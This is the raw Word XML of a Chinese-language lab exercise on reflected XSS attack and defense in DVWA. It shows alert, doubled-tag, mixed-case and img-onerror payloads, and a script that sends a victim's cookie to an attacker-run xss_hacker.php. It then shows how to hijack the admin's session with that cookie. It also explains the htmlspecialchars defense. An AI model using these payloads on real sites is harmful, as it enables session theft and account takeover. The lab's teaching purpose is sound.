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  <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_Toc27095555"/>
      <w:bookmarkStart w:id="1" w:name="_Toc27428"/>
      <w:bookmarkStart w:id="2" w:name="_Toc27096332"/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实训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24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反弹型XSS攻防实训</w:t>
      </w:r>
      <w:bookmarkEnd w:id="0"/>
      <w:bookmarkEnd w:id="1"/>
      <w:bookmarkEnd w:id="2"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeas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实训目的：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通过本实训，掌握反弹型XSS的攻击方法以及防御的措施。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeas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场景描述：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在虚拟机环境下配置3个虚拟系统“WinXP3”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和两个“Win7”，使得3个系统之间能够相互通信。本实训在如图12-3所示的场景中实现。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="220" w:lineRule="atLeast"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:object>
          <v:shape id="_x0000_i1025" o:spt="75" type="#_x0000_t75" style="height:170.25pt;width:396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图12-3 网络拓扑</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="center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3" w:name="_Toc27095556"/>
      <w:bookmarkStart w:id="4" w:name="_Toc27096333"/>
      <w:bookmarkStart w:id="5" w:name="_Toc21495"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>任务1 反弹型XSS攻防的初步认识</w:t>
      </w:r>
      <w:bookmarkEnd w:id="3"/>
      <w:bookmarkEnd w:id="4"/>
      <w:bookmarkEnd w:id="5"/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实训步骤：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1.在Win7（攻击主机）中访问WinXP3的DVWA主页，设置DVWA Security为“Low”，然后打开XSS（Reflected），查看服务器核心源码如图12-4所示。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019675" cy="1303020"/>
            <wp:effectExtent l="0" t="0" r="9525" b="1143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960" cy="13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图12-4 查看源代码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可以看到，代码直接引用了name参数，并没有任何的过滤与检查，存在明显的XSS漏洞。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2.漏洞利用，在文本框中输入“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;script&gt;alert(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asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xss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asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)&lt;/script&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”，然后单击“Submit”按钮 ，成功弹出对话框，如图12-5所示。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010025" cy="11144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图12-5 成功弹框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3.设置DVWA Security为“Medium”，然后打开XSS（Reflected），查看服务器核心源码如图12-6所示。可以看到，这里对输入进行了过滤，使用str_replace函数将输入中的“&lt;script&gt;”替换为空。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19700" cy="1838325"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="1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图12-6 查看源代码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4.这种防护机制是基于黑名单的思想，可以被轻松绕过的。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方法1：双写绕过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输入&lt;sc&lt;script&gt;ript&gt;alert(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asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xss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hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)&lt;/script&gt;，成功弹框。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方法2：大小写混淆绕过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输入&lt;ScRipt&gt;alert(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asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xss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hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>)&lt;/script&gt;，成功弹框。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5.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设置DVWA Security为“High”，然后打开XSS（Reflected），查看服务器核心源码如图12-7所示。可以看到，High级别的代码同样使用黑名单过滤输入，preg_replace()函数用于正则表达式的搜索和替换，这使得双写绕过、大小写混淆绕过不再有效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67325" cy="1876425"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1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图12-7 查看源代码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6. 虽然无法使用&lt;script&gt;标签注入XSS代码，但是可以通过img、body等标签的事件或者iframe等标签的src注入恶意的js代码。这里我们在文本框中输入“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;img src=1 onerror=alert(document.cookie)&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>”，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>这条语句表示在网页中插入一张图片，“src=1”指定了图片文件的URL，如果图片不存在（这里肯定是不存在了），那么将会弹出错误提示框，从而实现弹框的效果。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7.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设置DVWA Security为“Impossible”，然后打开XSS（Reflected），查看服务器核心源码如图12-8所示。可以看到，Impossible级别的代码使用htmlspecialchars函数把预定义的字符&amp;、”、 ’、&lt;、&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>这些敏感符号都进行转义，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>防止浏览器将其作为HTML元素。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>所有的跨站语句中基本都离不开这些符号，因而只需要这一个函数就阻止了</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "http://www.myhack58.com/Article/html/3/7/Article_007_1.htm" \t "_blank" </w:instrText>
      </w:r>
      <w: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XSS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t>漏洞，所以跨站漏洞的代码防御还是比较简单的。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67325" cy="2190750"/>
            <wp:effectExtent l="0" t="0" r="9525" b="0"/>
            <wp:docPr id="1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图12-8 查看源代码</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="center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9" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="9"/>
      <w:bookmarkStart w:id="6" w:name="_Toc27096334"/>
      <w:bookmarkStart w:id="7" w:name="_Toc27095557"/>
      <w:bookmarkStart w:id="8" w:name="_Toc882"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>任务2 获取管理员权限</w:t>
      </w:r>
      <w:bookmarkEnd w:id="6"/>
      <w:bookmarkEnd w:id="7"/>
      <w:bookmarkEnd w:id="8"/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攻击者利用反弹型XSS攻击，获取受害者的Cookie，从而使得自己从普通用户升级为管理员用户。因为这个实训是要获取受害者的Cookie，因此需要受害者在点击反射型URL的时候，受害者是以管理员的身份登录到DVWA系统中，而且是在同一个浏览器中进行这两个操作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实验步骤：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一．制作Cookie</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>接收</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>网页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1.在Win7（攻击主机）的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>C:\wamp\www</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>目录下新建一个文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xss_hacker.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，其内容如图12-9所示，该文件的主要功能是接收客户端发送的Cookie信息，并保存到cookie.txt文本文件中。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4399915" cy="1266190"/>
            <wp:effectExtent l="0" t="0" r="635" b="1016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图12-9 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>xss_hacker.php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二．攻击者制作反射型攻击URL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1.在Win7（攻击主机）中打开WinXP3的DVWA主页，以普通用户“gordonb”登录系统，其密码是“abc123”。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2.设置DVWA Security为“Low”，然后打开XSS（Reflected），输入“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&lt;script&gt;window.open("http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>192</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.16</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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0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/xss_hacker.php?cookie="+document.cookie);&lt;/script&gt;”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，单击“Submit”按钮，此时得到反射型攻击URL“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>http://192.168.0.3/DVWA/vulnerabilities/xss_r/?name=%3Cscript%3Ewindow.open%28%22http%3A%2F%2F192.168.0.6%2Fxss_hacker.php%3Fcookie%3D%22%2Bdocument.cookie%29%3B%3C%2Fscript%3E#”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，如图12-10所示。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5274310" cy="2373630"/>
            <wp:effectExtent l="0" t="0" r="254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图12-10 生成反射型XSS攻击URL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3.攻击者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>可以采取各种手段，包括</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>群</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>发Email，在各种论坛网站发布此攻击URL，做成诱人</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>链接等，引诱受害者打开该反射型攻击URL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>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三．受害者访问漏洞网站时中招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 受害者在Win7（受害主机）打开WinXP3的DVWA主页，以管理员用户“admin”登录系统。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2.此时如果受害者收到攻击者发送过来的反射型攻击URL，或者浏览黑客所伪造的钓鱼网站，并在同一个浏览器中打开该反射型攻击URL，就会执行有关脚本，打开黑客指定的网页xss_hacker.php</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsia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</w:rPr>
        <w:t>把受害者自己的Cookie值发送给攻击者，攻击者主机把Cookie值保存到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cookie.tx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>t文件中，如图12-11所示。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5274310" cy="722630"/>
            <wp:effectExtent l="0" t="0" r="2540" b="127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图12-11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获取的Cookie值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四．安装Edit This Cookie插件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1.下载EditThisCookie插件，把该crx文件传输到Win7（攻击主机）。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2．在Win7（攻击主机）中打开Chrome浏览器，打开“更多工具”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑"/>
          <w:color w:val="333333"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>→</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>“扩展程序”，直接拖拽插件安装。然后在浏览器右上角多了一个曲奇饼的图标，如图12-12所示。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09700" cy="381000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1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图12-12 安装EditThisCookie插件成功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五．利用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PHPSESSID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>获得管理员权限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1.在Win7（攻击主机）用Chrome浏览器打开Winxp3的DVWA，以普通用户“gordonb”登录系统。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2.利用EditThisCookie插件，修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PHPSESSID</w:t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t>cookie.tx</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>t中所记录的值，并提交，如图12-13所示。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4180205" cy="4591050"/>
            <wp:effectExtent l="0" t="0" r="10795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3469" cy="46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图12-13 修改</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>PHPSESSID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3.刷新页面，发现攻击者的登录用户已经变成“admin”，从而获得管理员权限，如图12-14所示。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1590675" cy="609600"/>
            <wp:effectExtent l="0" t="0" r="9525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eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>图12-14 登录用户变成“admin”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2021-06-07T15:55:54Z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4DCB28AD3B04451BBF52A0E6CE3E08C6</vt:lpwstr>
  </property>
</Properties>
</file>